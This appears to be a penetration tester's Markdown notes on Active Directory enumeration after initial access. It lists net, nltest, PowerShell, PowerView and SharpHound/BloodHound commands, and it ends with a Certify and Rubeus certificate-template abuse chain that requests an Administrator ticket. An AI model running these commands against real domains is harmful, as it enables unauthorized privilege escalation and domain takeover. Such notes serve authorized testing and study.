204 lines
5.0 KiB
Markdown
204 lines
5.0 KiB
Markdown
# Enumerate Active Directory
|
|
|
|
Enumeration following after initial credentials are gained
|
|
|
|
|
|
## SYSVOL
|
|
|
|
* On windows use `runas` and gain local administrative permissions via
|
|
```sh
|
|
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
|
|
```
|
|
* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
|
|
* Query DNS, for example the DC
|
|
```sh
|
|
$dnsip = "<DC IPaddress>"
|
|
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
|
|
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
|
|
```
|
|
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
|
|
```sh
|
|
dir \\%HOSTNAME%\SYSVOL\
|
|
```
|
|
* Check `SYSVOL` via `IP` address to force `NTLM` authentication
|
|
|
|
## Microsoft Management Console (MMC)
|
|
|
|
* Use AD Snap-ins of `Remote Server Administrative Tools`
|
|
* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
|
|
* `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
|
|
* Start enumerating via click on the domain object in the tree on the left
|
|
* Take a look at `People` directory -> right click on them to see properties
|
|
* Change or create user or change groups
|
|
* Also use `MMC` to enumerate
|
|
|
|
## CMD enumeration
|
|
|
|
Execute the following commands from any domain joined machine after inital access has been done.
|
|
|
|
Specific user
|
|
|
|
```sh
|
|
net user <username> /domain
|
|
```
|
|
|
|
Accounts & Groups
|
|
|
|
```sh
|
|
net user /domain
|
|
net group /domain
|
|
```
|
|
|
|
Specific groups like admins
|
|
|
|
```sh
|
|
net group <groupname> /domain
|
|
net group "Domain Admins" /domain
|
|
net group "Enterprise Admins" /domain
|
|
```
|
|
|
|
For local admin accounts:
|
|
|
|
```sh
|
|
net localgroup administrators
|
|
```
|
|
|
|
Password Policy via accounts
|
|
|
|
```sh
|
|
net accounts /domain
|
|
```
|
|
|
|
Machines on the network:
|
|
|
|
```sh
|
|
net view
|
|
```
|
|
|
|
Shares on specific remote systems:
|
|
|
|
```sh
|
|
net view \$SERVER_NAME /all
|
|
```
|
|
|
|
Domain/Trust, which is domain controllers in the current env first and further
|
|
trusted domains:
|
|
|
|
```sh
|
|
nltest /dclist:domain
|
|
nltest /domain_trust
|
|
```
|
|
|
|
## Powershell Cmdlets
|
|
|
|
User details via:
|
|
|
|
```sh
|
|
Get-ADUser -Filter *
|
|
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
|
|
```
|
|
|
|
Groups:
|
|
|
|
```sh
|
|
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
|
|
```
|
|
|
|
Group membership:
|
|
|
|
```sh
|
|
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
|
|
```
|
|
|
|
Admin group members:
|
|
|
|
```sh
|
|
Get-ADGroupMember "Domain Admins"
|
|
```
|
|
|
|
Generic AD objects:
|
|
|
|
```sh
|
|
Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
|
|
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
|
|
```
|
|
|
|
Domains:
|
|
|
|
```sh
|
|
Get-ADDomain -Server exampleDC.com
|
|
```
|
|
|
|
All Computer accounts which joined the domain:
|
|
|
|
```sh
|
|
Get-ADComputer -Filter *
|
|
```
|
|
|
|
## Sharphound and Bloodhound
|
|
|
|
* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)
|
|
|
|
* Change to AD user via `runas.exe` and collect via one of the following
|
|
* Sharphound.ps1
|
|
* sharphound.exe
|
|
* Azurehound.ps1
|
|
|
|
* For example
|
|
```sh
|
|
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
|
|
```
|
|
* After some time collect the current sessions via
|
|
```sh
|
|
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
|
|
```
|
|
* Start neo4j db
|
|
```sh
|
|
neo4j console start
|
|
```
|
|
* Start bloodhound
|
|
```sh
|
|
bloodhound --no-sandbox
|
|
```
|
|
* Drag and Drop the zip file from Sharphound
|
|
* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
|
|
* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts
|
|
|
|
## LDAP
|
|
|
|
## PowerView
|
|
|
|
Registered Machines in the domain
|
|
|
|
```sh
|
|
Get-NetComputer | select "name"
|
|
```
|
|
|
|
When the computers were added to the domain
|
|
|
|
```sh
|
|
Get-ADComputer -filter * -properties whencreated | Select Name,@{n="Owner";e={(Get-acl "ad:\$($_.distinguishedname)").owner}},whencreated
|
|
```
|
|
|
|
## WMI
|
|
|
|
## Find Certifications and Private Keys
|
|
|
|
Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git).
|
|
|
|
* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step
|
|
```sh
|
|
Certify.exe find /vulnerable /currentuser
|
|
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
|
|
```
|
|
|
|
* Copy the found key and convert it like mentioned in the last line of the ouptut, for example
|
|
```sh
|
|
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
|
|
```
|
|
|
|
* Get ticket with the the loot via Rubeus
|
|
```
|
|
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
|
|
```
|